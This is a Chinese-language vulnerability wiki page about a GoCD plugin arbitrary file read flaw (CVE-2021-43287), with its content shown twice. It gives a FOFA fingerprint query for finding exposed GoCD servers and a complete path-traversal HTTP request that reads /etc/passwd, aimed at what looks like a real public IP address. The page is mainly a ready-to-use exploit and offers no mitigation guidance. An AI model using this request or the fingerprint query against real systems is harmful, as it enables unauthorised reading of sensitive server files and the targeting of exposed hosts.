fofamini-wiki

登录白背景

源码

GoCD plugin 任意文件读取漏洞(CVE-2021-43287)

一、漏洞简介

GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞，导致攻击者可以获取服务器中的任意敏感信息。

二、影响版本

GoCD

三、资产测绘

fofatitle="Create a pipeline - Go"
特征

四、漏洞复现

GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1
Host: 52.55.136.46
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/hdbznoglk2art5zm

# GoCD plugin 任意文件读取漏洞(CVE-2021-43287)

# 一、漏洞简介
GoCD plugin aip 参数中的 pluginName 参数存在任意文件读取漏洞，导致攻击者可以获取服务器中的任意敏感信息。

# 二、影响版本

- GoCD

# 三、资产测绘

- fofa`title="Create a pipeline - Go"`
- 特征

![image.png](./img/nZo6j-2oZf79SxOE/1708237868895-e7fb52e0-8de7-4894-82e1-7680d5e41461-316510.png)

# 四、漏洞复现
```
GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1
Host: 52.55.136.46
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
![image.png](./img/nZo6j-2oZf79SxOE/1708237895430-c6f3ebaa-78b7-4e55-8a1e-822c521fd1ed-128294.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hdbznoglk2art5zm>